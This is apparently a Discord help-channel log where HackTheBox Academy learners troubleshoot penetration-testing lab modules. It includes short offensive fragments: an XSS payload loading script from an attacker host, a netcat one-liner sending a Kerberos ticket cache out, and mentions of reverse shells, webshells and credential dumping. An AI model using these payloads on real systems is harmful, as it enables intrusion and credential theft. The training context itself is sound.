#modules

Dm me it

Yeah, have seen it happen on an internal. Definitely not something likely to find but I have seen it irl

ok hold on

it's a misconfig

Anyway, i have to upload a reverse shell and when I try to upload the file or modify the request in repeater, it does not allow me to do so.

yes it doesn’t, that will be too easy, wouldn’t it?

i mean, finding an api key in a repo, yes, but just having a the ability to register doesn't really seem like a vuln

I mean... But I'm following exactly the same steps as the official solution, what would be the point if it didn't work?

by “the official solution” i’m assuming you’re talking about the examples?

it’s not plug and play

news flash

No, there is literally a button that says "show solution" that shows you how to solve the exercise, I do exactly the same thing, but it still doesn't work

Should I just report it as info with 0 CVSS score?

depends on how severe it is

reread this solution l, sometimes solutions like these have hidden steps or very subtle changes that you might have missed

I don't remember exactly what it was but there was something that lead us to another vuln. And in this case the ability to register gave access to private internal repos so it leaked internal sourcecode

if you can register an account and get access to sensitive information, that would probably get a higher CVSS score than registering and getting access to nothing sensitive

hi can u pls help me?

no, i have no notes or recollection of the module + section you're doing

Okay, I'll read the solution again and try again several times, if it doesn't work, can I send you a DM?

yes

Thanks!

okay, np

anyone know anything about pop3 mail?

Can someone pls help

yes

Can you find the port and type of mail server (smtp, pop3) for this mail server "mail.notismail.com"

How would I find it because this is something I need to replicate

what module is this?

an email module forgot exact one

is the session security module actually useful for the cbbh exam as it seems more informational than anything

Okay I got the answer to #Attacking Common Services, DNS. And should have gotten it way sooner.

Thanks for the assistance and advice, dns zone transfers are always a little tricky

How to write in offtopik?

verify your account by following the steps in #welcome

wanna give a huge thank you and shoutout to @safe star for helping me with this module...couldnt have done it without ur thoughtful and considerable time

Honestly this connection issue is so annoying, making academy unusable rn

the vpn spits this out aswell

looks like the network is unreachable

Yeah, thanks

you're welcome buddy

If anyone can actually help then feel free to respond here or dm, but I feel like its def a platform issue

Did you try downloading a new vpn file?

Yeah, and switching servers

Has anyone here completed the attacking common services module without guidance? It might just be a skill issue but this module seems unreasonably difficult. It assumes you will searchsploit coreftp without knowing the version, then it assumes you will try a directory transversal despite not covering this material prior to the module. This is in addition to creating a webshell which shouldn't be exceedingly difficult but prior to this module its maybe comes up once :/ Am I dumb?

Having VPN issues too myself, so seems like it's not an isolated incident. Literally been stuck on "Target(s) are spawning" for the past 5 minutes and counting (Module: Linux Privesc § Capabilities)

that easy lab was def one of the harder skill assessment

I could use some advice for module#Footprinting, section DNS. I've tried to complete this module multiple times but I always get stuck. If anyone could please give me a suggestion in the right direction it would be greatly appreciated. I have submitted what command I'm currently running to enumerate DC1

||for i in $(cat /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt); do dig DC1.$i.inlanefreight.htb @ns.inlanefreight.htb | grep -v ';|SOA' | sed -r '/^\s*$/d'; done||

that shouldve been swapped with the hard lab

you're not dumb

thats normal

its just trying to simulate a real world scenario

Am I going in the right direction or should I instead try something else?

wouldnt it be better to just use a dns tool, then use a script to dig the subdomains found?

I was hoping that I feel so demoralized lol but the grind continues😤

I thought I would try this route becuase I believed I had already discovered all the subdomains

But I'll go through again using a dns tool

Hii

https://academy.hackthebox.com/module/158/section/1437

Does anyone know which release of Chisel is the valid one for this module / section?
The target is throwing the following error with all the minor versions I am testing:

./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel)

who knows hack please

wasnt this dude here earlier?

SOLVED.
v1.10.0
Instead of compiling the source code on my machine and sending it, I downloaded the .deb file, installed it, and sent the copy directly from /usr/bin/chisel.

" Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer. "

I only need help on the "use the cracked password of the user kira and log into the host..." does it mean the password that was shown earlier in the section? because that doesn't work on ssh. along with the username. Am i missing something? or is it from a previous section and not in the protected files section at all?

you're missing something from a previous section

brutal

Hey guys i'm on the module login brute force section skill assement 1, i need to brute force creds trought web auth but after 20 minutes stil nothing can anybody help me?

hi, this is from Module: Pivoting, Tunneling

ubuntu@WEB01:~$ cd ptunnel-ng/
ubuntu@WEB01:~/ptunnel-ng$ cd src/
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.180.111 -R22
[sudo] password for ubuntu: 
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

I am creating a ICMP tunneling server using ptunnel-ng on the target host (Ubuntu) and i've transferred the repo files via scp.
How can I resolve this error?

install missing dependencies

the compromised machine can't resolve

the links

maybe thats because the compromised machine doesnt have access to the internet?

Yeah, it doesn't. How can I get it to install them?
In such cases, I usually transfer the files via my attacker box to compromised machines, but I'm unsure for libraries

why not just do that

are you still stuck ?

Nvm, I just created a binary out of it and used it. Thanks anyways

Can someone test double check my code for the IntallUtil section in the win av evasion module? Im pretty sure its right and the .txt says it passes all checks and is executing but got no shell

jup

then you might have the wrong username

Its not about that i use the list they ask me to use

I uses this but with -L top short username (the one provided for thé assigment) and - P 2023….. doing the auth from / directory

I'm in AD Enumeration & Attacks > Assessment #1 and
||I've dumped the SAM database on a machine to discover there is a DefaultPassword. IIRC this indicates the system is set to login automatically, and to do this it caches the password cleartext. Why is the user unknown (see "Unknown User" below) though? I can't remember if this is typical output (I am looking for the right section to reference but no luck so far).

[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):<redacted_cleartext_password_here>
[*] DPAPI_SYSTEM 

||

Yeah I don't remember. I just used netexec to work the problem.

huh, ok, I'll play with that too. Thanks.

What you dumping with

Isn’t that the lsa?

No it's SAM and I used secretsdump.

I know the right answer but I see what R1cky's saying about just finding out using nxc if I didn't.

I just don't remember if we usually get a proper username in that scenario. I don't remember it looking like that before.

That’s how it is with mimikatz too

No username just password

I also just use netexec

Ok, thanks for the confirm.

Hey its me back to complain again, does anyone know when support goes back online?

Probably in the morning.

I can compare your code to the one I got in my notes

Target machine for the Linux Privesc skills assessment is taking 10 minutes and counting to spawn — after the ||T****t M*****r|| crashed on the previous instance and left me with no service running. Any idea what's going on?

most likely a browser issue, ctrl+shift+r

It's more than that because I've got a webshell on the box now but my Netcat listener won't pick it up.

well no, you said the target wouldn't spawn. if you were able to connect then the target is spawned, so that's a totally separate issue.

Question for anyone taking Intro to Assembly, in the Procedures section, there is a question: " Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes)"

Why is it that the answer is not obtained by adding a breakpoint when entering the "exit" function and checking its rsp, I got the answer by copy pasting all the memory addresses of the binary itself but it feels a little bit underwhelming to have gotten my answer by doing that. I'd like to know someones expert opinion please 🙏

strange

at the start of the exit func rsp should point to the ret addr

that call just pushed onto the stack

Ahhh you're right, I read up my command history and it's showing the answer, I probably copy pasted the wrong thing initially. Sorry about that 🙏

awesome

awesome sauce

I could use some help with "introduction to NoSQL Injection", im trying to bypass authentication of MangoMail but it says "please enter an email address" when i input the exploit code (which i assumed would surely work). i have tried all kinds of different code snippets but the result is the same.

Try it in the RDP session you might have. Not in your machine

Wdym?

You have an RDP session to a machine connected to the internal network

Once you have a session in a Host connected to the internal network you can use whatever this Host have
You don’t need to use it from your machine

There is one of the Hosts that have a VNC Client

Hello guys, can someone help me with the Information Gathering - Web Edition Skill Assessment

With this question:
*What is the API key in the hidden admin directory that you have discovered on the target system? *

I added the following line in my /etc/hosts file <ip> inlanefreight.htb. Then I try to use ffuf to enumerate the subdomains with ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://FUZZ.inlanefreight.htb:<port>" (also tried it with gobuster).

I do not get any results. Could someone explain what I am doing wrong here?

make sure to check the part where you do vhost fuzzing

if you only added the main domain, you will not get any results

Aaah I see now. Thanks for the tip!

good lcuk

any idea?

this is my command rn

for the login brute force module skill assigemnt 1

ow okej i get it rn ahhaa

I'm doing the File Upload Attacks module in the Blacklist Filters section, and I'm stuck because I can upload a file in php8 but it changes it to <!--?php echo "Hello"; ?-->
Does anyone know why it changes it?
Can someone help me please

Not sure why? But you can try other extensions not all the extensions will work with your target

hey guys i have a question about a module can i get help here?

hey guys are we learning how to hack here ?

you came to the right place @harsh sundial

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@idle rampart 👆

so i was doing the linux fundamentals module
and all good and well but i got stuck on this question

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

So what part did you get stuck on

idk i wrote a couple of lines

they all gave me results but none seem to be working right

i asked ai for help but he couldn't get the right one either

Ai is shit at getting it

ah okay sometimes i use it to give me hints

There's a forum answer that breaks down the commands and explains better

oh thanks can u link it to me ?

Google is free

it is the hack the box forum

Yes

allright thx

You can probably find it if you use the discord search function

yea no i got it thank you

Hi

hello

I cannot access Pwnbox for practice. Perhaps I already used it for 2h free. Is there anyway I can practice for free?

Stand up your own kali/parrot/whatever and use the VPN. It's way better that way anyway.

sir you replied to a bot

Here to learn the art of Pen Testing

F

Hello, I'm doing AD Enumeration and attacks. I get error when I issue following command.
kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
The issue is because I've ip in the range of 10.x.x.x. How can I connect to reach out to 172.x.x.x ip?

Is the port on proxychains.conf socks5 127.0.0.1 1080 the port Chisel is gonna listen to? Or should I just leave it on 1080?

Also, do I need to set the IP to my attacker machine?

you set the ip to match what ever machine chisel is hosted on

that line is for proxychains to know which proxy to connect to

noted on the IP. Do I also set the Port same as Port of Chisel listener?

What about the socks4? Can I keep both socks4 and socks5 on proxychains.conf or should I remove socks4 and keep only socks5?

Module: Pass the Ticket - Linux
https://academy.hackthebox.com/module/147/section/1657
Also, after establishing Proxychains and Chisel, how do I utilize it for file transfers? Do I still need to establish a server apart from the
(proxychains and chisel) on where the ccache is being held or I can just utilize the proxychains and chisel itself?

Pivot Host is the MS01 right? Because LINUX01 is only reachable through PORT22 by configuring the PORT2222 of the MS01. Right?

Bro pls explain. How do I utilize the the proxychains and chisel once I have establish the connection.

you can keep both if you have a reason for mixing

you can use a tool that respects the proxy for this

if LINUX01 is reachable throught MS01 then yes it is the pivot host

Why can't I speak in general? I'm asking here because this is where I'm always redirected

Anyone for a nudge on the HTTP Attacks Skills Assessment? I can bypass the WAF, but cannot see anything on /mail if I attack SMTP. According to the instructions, the WAF is there to protect internal endpoints, but I cannot find which one.

#welcome brings all the answers for your quest on getting verified

go back to the first section, it explains how to connect. You attack from the provided jumpbox

Can I ping you 1:1?

ok

Hello, I'm working through Attacking Common Services, Attacking DNS and have hit a wall. I found three subdomains, ns, control, and helpdesk, but none of them are yielding new DNS records. I've tried using dig axfr, dig any on each with nothing to show. Also every time I run subbrute with the names.txt file I get a ProcessLookupError, which seems odd. Anyone got any ideas for me to try next?

any good alterntives to proxychains

I swear to god this thing works 1% of the time when it feels like it

thanks a lot!!!

Ligolo

Proxychains is clunky as heck but sometimes it's the only easy alternative

Hello everyone,

I am still on the Information Gathering - Web Edition skill assessment.
I am looking for the API key, could someone give me a clue on how to do it?
I already have the robots.txt and the hidden folders but no clue yet

on finding the API key

Module: Network Enumeration with Nmap
Section: Host and Port Scanning
Hey, I'm really struggling with the second task in this section:

Enumerate the hostname of your target and submit it as the answer. (case-sensitive)

I have tried -A / -sC -sV
and -O
-O -osscan-limit

i was just able to do it with -sC.

Module: Linux Priv Esc
Section: LXD

i have a running container with elevated privileges, now i want to establish an interactive shell into it, but my command throws an error, command not found.
lxc exec privesc /bin/bash
im not sure what command is not found, the lxc binary works just fine, i used it to make the image and container and stuff

or does that mean on the target container is no /bin/bash ?

||oh got it, there is no bash on alpine :/||

The Output is Empty.

?

That sounds weird, you scanned a target yeah?

what's your whole command?

reset target and try again

sudo nmap -Pn -sC 'Ip-target'

I will try

sure :d

preferably without the quotes ''

yeah of course bro without quotes

what happens if you take out the -Pn?

not running
saying try -Pn

what happens when you just ping it?

cant ping too, I have tried this before

terminate the target box and spawn a new one. you should at least be able to ping

I will try that

I think it's paying off
now i can ping the target 🤩

The Output guys 😒
is it normal?

Nmap scan report for 10.129.7.36
Host is up.
All 1000 scanned ports on 10.129.7.36 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 207.78 seconds

does it look normal to you?

I am currently working on Attacking Enterprise Networks module, section Lateral Movement. Trying to answer the last question, which is to obtain NTLMv2 password has for mpalledorous. The Inveigh module has been running for a while now, but there are no hashes. Am I missing something?

nah

Could someone please explain to me what the commands in the File Transfer In Linux With Bash mean?
I'm kinda lost. Not quite like anything I've seen before they look sort of odd.

what do you mean

it’s standard bash syntax

Anyone???

I mean it usually looks like nc -nv <TARGET IP ADDRESS> <PORT NUMBER> or rlogin <TARGET IP ADDRESS> -l <ACCOUNT NAME> or whatever. In the commands in the section I mentioned I have no idea what's going on. Like what's exec 3<> etc.

Linux PrivEsc, Section Logrotate
i am able to get logrotate to get triggered by changing a log file, i have my payload set up and my rev shell waiting to be called, but logrotten catches the rotation and does his thing, but wont establish a shell, i have no clue why it wont connects to me back, ip/ping is correct

Did you run it on the right machine?

In the labs the llmnr attacks are targeted so you can’t run responder on any machine to catch it

exec 3<> basically opens a file descriptor with the number 3 for both reading (<) and writing (>)

see not so strange now

you can do this exec 3<> file.txt
cat <&3 to receive input from file.txt

when you’re done with it you could close it exec 3>&-
i suggest you do the intro to bash scripting module before going any further

or don't, to be honest you don't need to and cannot possibly know every detail about everything

ignore that unless it’s something you can afford to skip 👆

yep, always up to each individual. I would not stop learning file transfer methods to go learn bash because I didn't understand a one-liner that I can use without understanding, but that's up to me

hence the "or don't"

if you don’t understand what every command does you risk leaving yourself vulnerable to problems you will not be able to solve

if that works

for you

I'm ok with that, but yeah, up to each one to decide. Just giving an alternative

yes

I am having issues with the Information Gathering - Web Edition Module Skills Assessment. I cannot for the life of me, even ping inlanefreight.htb let alone do anything else with it like dig, dnsenum, etc. I added the IP with port and the inlanefreight.htb domain name to the /etc/hosts file, but it no workie. I tried without the port number, nothing. What am I missing?

I believe that's what I did when I dropped in the IP and domain (inlanefreight.htb) to the /etc/hosts file unless I did it incorrectly. I also tried modified with the port, no bueno.

for someone who wanna know, everything was set up right, but for some reasons it wont connect everytime, and if, just for like 5 seconds, so gotta be fast for printig that flag xD

As admin?

Yes as an admin

With all the privs and everything?

Are you using the exe or ps1? Maybe try the exe if not

Yeah just do it fast

You could probably just do another reverse shell after that one

ended up creating a new admin for this. worked. thanks.

yeah, but now im finished with this Module, this logrotate was the hardest imo

May I ask how you fixed this?

You don't put the port in the /etc/hosts file, you do use the port when making requests to it

I.e. you'd visit http://inlanefreight.htb:port

Your hosts file will look like
ip inlanefreight.htb

Hi, I have exactly the same issue... were you able to solve it? I am getting crazy after two days of research still no answear how to solve this

Try with sudo

Guys I'm in ad enumeration and attacks - skill assessment part 1 - question 3

It's not about the question, I can't fucking import active directory module

It keeps saying theres no file

I copied these files

Activedirectory.ps1
Activedirectory.psd1
Powerview.ps1
microsoft.activedirectory.management.dll

In the following directories
C:\windows\system32\windowspowershell\v1.0\modules
C:\windows\system32\windowspowershell\v1.0\modules\ActiveDirectory

C:\program files (x86)\windows powershell\modules
C:\program files (x86)\windows powershell\modules\ActiveDirectory

It keeps giving me error

Thanks for quick reply!

I tried:
sudo ssh -D 9050 ubuntu@10.129.29.209

netstat -antp | grep 9050
tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN

tail -4 /etc/proxychains.conf

socks4 127.0.0.1 9050

sudo proxychains nmap -v -sT 172.16.5.19

Still not working...
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

Try -Pn

but the problem is solution shows that it could be possible without -Pn... I mean nmap in solution shows open ports, with -Pn I can achieve only filtered, and other apps don't want to work either eg. proxychain firefox

edit: I think really sudo for ssh solved my problem... I'll retest on another lab and let you know, thanks!

lemme check

I am talking about this module: https://academy.hackthebox.com/module/163/section/1547 (Attacking Enterprise Networks Internal Information Gathering)

Why does the WINLPE-SRV01 desktop keep reloading every 2 minutes and interrupting File Explorer sessions in the process? Makes it nearly impossible to work with.

Does anyone else have trouble getting proxychains to work from time to time?

For me, sometimes proxychains will work, and sometimes it doesn't.

Yesterday and today, everything was working fine. Now all of a sudden I'm getting time out messages.

I didn't change a thing, I'm not doing anything different.

I've noticed in some forums how this is a common issue.

Try using this instead: https://youtu.be/qou7shRlX_s?si=8bpaZj5EO4L2u8WC

@safe star ?

yeah its working for me

but the ip you used doesnt exist

i think theres some weird scheduled task running in the back

thank you for checking, it is driving me mad yes, this IP does not exist there, I was doing lab from Pivoting&Tuneling module where it was introduced... anyway I will just try this Ligolo thing, I give up for now thanks kennystrawnmusic

This is, as you can probably guess from the machine name, the Windows Privilege Escalation § Communication with Processes module I'm trying to work on only for this problem to rear its ugly head and interrupt my work.

yeah it was annoying but it bearable

Guys I'm in ad enumeration and attacks - skill assessment part 1 - question 3

It's not about the question, I can't fucking import active directory module
I copied these files

Activedirectory.ps1
Activedirectory.psd1
Powerview.ps1
microsoft.activedirectory.management.dll

In the following directories
C:\windows\system32\windowspowershell\v1.0\modules
C:\windows\system32\windowspowershell\v1.0\modules\ActiveDirectory

C:\program files (x86)\windows powershell\modules
C:\program files (x86)\windows powershell\modules\ActiveDirectory

It keeps giving me error

masterhu it'll be helpful if you specified the error

Hey I'm starting Introduction to Windows Evasion Techniques ...I spun up the pwnbox and set the command to RDP

you can see that it doesn't work as I don't have the IP address of EVASION-DEV

you can't ping EVASION-DEV for IP resolution...and dig doesn't return anything

wait im a moron

helps if you spin up the dev box first lol

Why is it that even after transferring julio's ccache on Pwnbox and setting it using export KRB5CCNAME=/root/<julio-ccache> the path is also correct and I've also change permissions of the ccache using chmod 777 <julio-ccache> when I do klist, it still says "Unsupported credentials cache format version number"

Module: Pass the Ticket (PtT) from Linux

upon checking the env var using env | grep -i krb5 its properly set too

verify file format using file

it says "krb5cc_647401106_HRJDux: HTML document, ASCII text, with very long lines (365)"

is this right?

no

what should it be?

looks like it was turned into a html document during transfer

I just used curl -O to transfer it

ftp/scp default to ascii mode for file transfers btw

ok ill try again using scp

well you grabbed a html doc

awesome

proxychains scp -o "ProxyJump david@inlanefreight.htb@linux01" svc_workstations@inlanefreight.htb@linux01:/tmp/krb5cc_647401106_HRJDux /home/htb-ac-1003645/transfer Do you have anything better in mind to conduct file transfer once Chisel and Proxychains has been established?

why did you use proxychains for that?

because linux01 is unreachable externally and MS01 is the Pivot Host that has access to linux01. MS01 is reachable externally

ms01 and linux01 are both reachable without pivoting

dc01 isnt

if this is the case, why would the module teach you to set up the chisel and proxychains then? ```Scenario

To practice and understand how we can abuse Kerberos from a Linux system, we have a computer (LINUX01) connected to the Domain Controller. This machine is only reachable through MS01. To access this machine over SSH, we can connect to MS01 via RDP and, from there, connect to the Linux machine using SSH from the Windows command line. Another option is to use a port forward. If you don't know how to do it, you can read the module Pivoting, Tunneling, and Port Forwarding. As an alternative, we created a port forward to simplify the interaction with LINUX01. By connecting to port TCP/2222 on MS01, we will gain access to port TCP/22 on LINUX01.```

Based on how I understand it, the port 2222 on ms01 is configured in a way that when you connect to it via SSH, it'll connect you to Linux01's Port 22

Right?

back on this question, is there any simpler way to conduct file transfer once chisel and proxychains has been established?

scp?

Anyone know how to passcode crack

that is in the module password attacks

Pardon?

Do u know how to do it?

i havent done that module

Can u try

i just used nc to connect back to me and transfer the file

no proxychains needed

why would i do that

I got scammed

contact support

Bruh

That’s a lame way to do stuff

thats right

but its just the way it is

But I can make his life miserable

Which is finer

Fun

CUS he took my money

you know what

hell yeah

Your gonna help me ?

no

Bruhhh

why this happening to me

Is anyone able to help with "Misc CSRF Exploitation"? I got the client side redirect to work but when i tested it on my end the session cookie was not getting included in the redirection?

this wouldn't and didn't work mate. Pwnbox cant even ping the linux01 as its not reachable externally.

scp svc_workstations@<IP>:/home/user/file.txt /local/directory/ Do i specify the IP of Linux01 in which where the ccache file will come from or do I specify the MS01 IP?

thanks mate, you saved the day!

1. scp svc_workstations@10.129.147.77:2222:/tmp/krb5cc_647401106_HRJDux /root
2. scp svc_workstations@inlanefreight.htb@10.129.147.77:2222:/tmp/krb5cc_647401106_HRJDux /root
   both are connection refuse

i transferred the file to me tho?

svc_workstations doesnt own those files

it woudlnt work anyway

what are your steps? I can't .

use -P for port

I already switched to root and chmod 777 the ccache

Import-Module .\SeBackupPrivilegeUtils.dll
Operation is not supported

Looks like some outdated module content. Either that or how do I get PowerShell to recognize said files as valid for import?

linux01: nc -q 0 <my IP> <port> < krb.ccache```

??

scp should work since you changed the privs, but i think a new ticket gets replaced at a certain interval

you're trying to import a binary module

is this what the module discussed?

because modules are basically .ps

the scp -P worked man. Thanks so much!

was able to transfer now the ccache without changing the file format of it

awesome

thanks to you too Mr

That's literally what Windows Privesc § Windows Built-In Groups says to do.

with that command?

Yes. https://academy.hackthebox.com/module/67/section/601

powershell module != dll

I'm aware of that, but apparently whoever wrote the contents of the module isn't.

the instruction you're quoting probably involves loading a utility that enables that privilege

not sure, never had a problem with that

it cant mean just slap it onto import-module

now OBVIOUSLY the operation is not permitted

a quick google search says to load via add-type

The lesson seems to be very buggy.

worked fine for me

try restarting

ah the plot thickens

are you sure you have the right dll?

Did you run any other commands before trying to import them?

no

Resetting the target worked. Mistake was trying to load another copy that wasn't the version already on the target.

I'm currently on the meterpreter tunneling and portforwarding section of the Pivoting, Tunneling, and Port Forwarding module. I had to step out before finishing the last question yesterday, but when I tried to do it today, I keep getting Segmentation fault (core dumped) when trying to execute the payload through ssh. Was not having this issue yesterday.. I've tried making a new payload and restarting the VM and I'm still getting the same error. Any ideas why?

if it worked yesterday then it has to be an issue with the payload and not the machine

right?

maybe need to respawn the target or wait longer for the environment to fully boot up

That's what I'd assume too but making a fresh payload for a respawned target that's been up for 12 minutes prior to me making an attempt led to the same error output

Hello, I'm working through Attacking Common Services, Attacking DNS and have hit a wall. I found three subdomains, ns, control, and helpdesk, but none of them are yielding new DNS records. I've tried using dig axfr, dig any on each with nothing to show. Also every time I run subbrute with the names.txt file I get a ProcessLookupError, which seems odd. Anyone got any ideas for me to try next?

Hi guys, I'm trying to have a server on the Pivot Host using Chisel Reverse Pivot:

./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)

How can i resolve this?
This is the Pivoting module

use an older version of chisel

Alright, amazing, thanks!

probably something wrong with your subrute command, are you using the resolvers.txt too?

Yep, I put the IP of the target in the resolvers.txt file

./subbrute.py -s names.txt -r resolvers.txt -p inlanefreight.htb

double check everything, your command, the files, make sure no spaces in the text files etc

Are you saying in regards to the ProcessLookupError?

yeah either that or maybe something wrong with your python

Okay

I'm running the command with verbose and it's checking properly, so far, I'm waiting to see where it dies

Checking: rainfield61.inlanefreight.htb
Checking: disneyandmore.inlanefreight.htb
Checking: yalla-tv.inlanefreight.htb
Checking: jquerybyexample.inlanefreight.htb
Checking: partylandportugal.inlanefreight.htb
Checking: iansnaturism2.inlanefreight.htb

awesome

Figured it out. I'd forgotten to set the appropriate payload in the msf listener😑

awesome

Oh, I should probably note the ProcessErrorLookup was coming up on the Pwnbox, not my personal machine. Should I report that to someone? I am 29000 subdomains in and no error yet on my personal machine

I feel like the Module RDPOverSocks is not that well-written, and it lacks diagram too to understand whats really happening.

Im confused with what the target is here, whats the pivot host and whats the attacker host

your vm/pwnbox is the attacker host, the pivot box is the box you're tunneling your traffic through, and the target is the target you're trying to reach

Hey guys

Hello kid

I mean, the OS and IPs in that particular section SocksOverRdp

it's windows, generally rdp = windows and ssh = linux (but both can have either)

Not that,
I'm having a hard time understanding whats on 172.16.5.x and whats on 172.16.6.x
for this section:
https://academy.hackthebox.com/module/158/section/1439

And why are we transferring Proxifier to the Pivot this time?

You can read about it more here: https://www.proxifier.com/ -- it just redirects your traffic through a proxy

I know. But the last few sections that I read, we usually set up Proxifier on our attacker host. Here, we transferred it and set it up on Pivot. That's what confused me

A diagram would help

Does anybody know how to get free membership of a youtube channel?

i don't recall ever using proxifier on the attacker host. proxifier is a windows app.

this isn't the discord for that kind of stuff.

its when the attacker host is Windows I mean

the attacker host is pwnbox or your linux vm

you don't run proxifier on it

Okk

I am new can anyone tell me something special

lol

Right. I think I get it a bit now

It’s gonna be full moon next week

i can tell you how to verify your account

I eat a KFC and later regret it.

You should verify your account 😅

Correspondence can tell you how

😉

This is the hardest lesson to learn.

hii

hiiiiiiiiiiii

hello

how to get around this

Kill the process using port 80 or use different port

I don't advise killing the process running on port 80 on the workstation

diffrent port doesnt seem to be working

@rustic sage not the place

Oh

aw I was reading that

Oop where do I do that then

?

not in this discord server

Oh

I ha e a question why can I chat in general

Go through #rules and then #welcome

Probably been asked before, but is it possible to reset module progress? I completed a module last year and would like to go through it again from fresh.

Nothing of that sort from the frontend afaik

probably a cool little project to make a small browser plugin to hide the answers

Can someone help me with the XSS Filter Bypass section of the Advanced XSS and CSRF Exploitation Module? I have found that the <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> can get an alert. However when I change the payload to the exploit server link and put my payload I don't seem to be getting anything on the exfiltrate.htb:PORT/log page. The hint says that you shouldn't put a port in the payload and I haven't but I can't seem to get it to work. Can someone help pls?

In Attacking Web Applications with Ffuf In the skills assessment, I'm trying to submit the answer and I'm pretty sure it's correct.
But it keeps saying Incorrect answer!

It's the question that says One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

Check the hint

I did

ABUSING HTTP MISCONFIGURATIONS SKILL ASSESSMENT HARD :
I was able to find the first vulnerabilty and exploit it to get access to another dashboard. But now im stuck on the second part where I have to input a code to proceed. I assume its a Host Header Injection, which I tried several attacks. But im stuck. Anyone willing to give me a nudge?

BRUUH, I was just supposed to replace the actual port with the word PORT.
I mean I read the hint but It did not specify the answer should be like this.

follow the provided syntax

thank you.

Ignore. I figured it out. Used a different XSS payload

Hey guys I'm having trouble with Alert machine can someone help me please?

Yes no problem check dm 😉

#1309940693002752140

If you can't access it - read #welcome

Oh I'm sorry

no problem 😄

Thanks bro 🙂

Oh btw

I saw something like "respect" on htb

what is it? how to gain respect?

when users visit your profile they can respect you

Oh alright

For the active directory enumeration and attacks module

section of LLMNR/NBT-NS Poisoning - from Windows

The rdp access doesn't work

and when it works i get to have like a minute before i get kicked out of the windows machine

i have been strugling now with the same issue for an hour maybe because i cant answer the last question i'm thinking about skipping it now

I get this error whenever i try to access the machine via rdp

xfreerdp /v:10.129.122.19 /u:htb-student /p:Academy_student_AD!
[04:52:01:808] [6797:6798] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[04:52:01:809] [6797:6798] [ERROR][com.freerdp.core] - failed to connect to 10.129.122.19

Can you try with remmina or rdesktop ?

please help i stuck on https://academy.hackthebox.com/module/110/section/1051 question i'm trying 3 days please help

it is for todo list on dashboard

Do u guys know good resource to learn Windows and Active Directory? I have 0 experience in that.

both have the same issue aswell

Can you restart the target

i did multiple times aswell

i tried resetting the vm and also the target

Best to contact support then

i'll just skip it for now and maybe get back when i finish the whole module

because i already know how to answer and everything but its just buggy

have you tried reaching out to support?

no i haven't
how can i do that?

do i need to email them and something or just a quick chat box?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

https://academy.hackthebox.com/module/103/section/1008

how can i identify what type of injection i can use?
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>

is there an automated tool to help with that? whcih checks which parameters are working? xsstrick is not woking for the given test

When you don't have visibility to the source code, fuzzing the the input with automated tools is the way to go

XSStrike mostly works for basic, but the more reliable way to go is to write your own script that works much better depending on the endpoint/application you are attacking

mhm okey thanks

What exactly are you having trouble with?

i made these and i placed
"><script src=http://192.168.29.249:8080/script.js></script>

but im not getting any response on my php server

https://academy.hackthebox.com/module/103/section/1008

can someone tell me what am i doing wrong

Hi everyone, I'm on Attacking Web Applications with Ffuf on the Skills Assessment - Web Fuzzing section and on the question:
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

I found the page but I don't know the expected format because it always tells me it's wrong but, I test on the pwnbox browser, it's the right page.

Can someone help me?

how are people supposed to help you when you arent sharing all the information?

Do you get any http requests made to your machine?
How is your php listener setup?
Do you even run http.server and php server at the same time?

1. no i did not get any request
2. sudo php -S 0.0.0.0:8080
3. http server? no i didnt, im trying to import script from my vm to the xss injection website

Make sure you understand what is going on.

Your xss payloads make a http request to your php server on port 8080, however your supposed to make your xss go to your js then the js will call to your php

Setup python3 -m http.server on port 8000 in its own terminal
run your php server php -S 0.0.0.0:8080 in its own terminal on port 8080

Then send your xss payload to "><script src=http://192.168.29.249:8000/script.js></script>

xss -> port 8000 hosting your image that makes a request to your php server on port 8080

xss -> js -> php

Are you sure 192.168.29.249 is the VPN IP? @eager zinc

yes

i mean he is expecting a callback with no server

thanks i was able to get it

sweet

I solved thanks

With the Nmap enumeration medium lab "After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. " am I just formatting the answer wrong?

I have found the dns server on the UDP port and discovered what service is running (An open source DNS) but answer isn't accepted. Is my formatting just wrong?

someone can help me how to use codes in Plans?

use codes in what now?

annual plans's code

Ahh, you should be able to add a code in the checkout https://app.hackthebox.com/vip

This is not for Academy

Thank you

how to check vpn ip

oof that is why i was having trouble

i got it

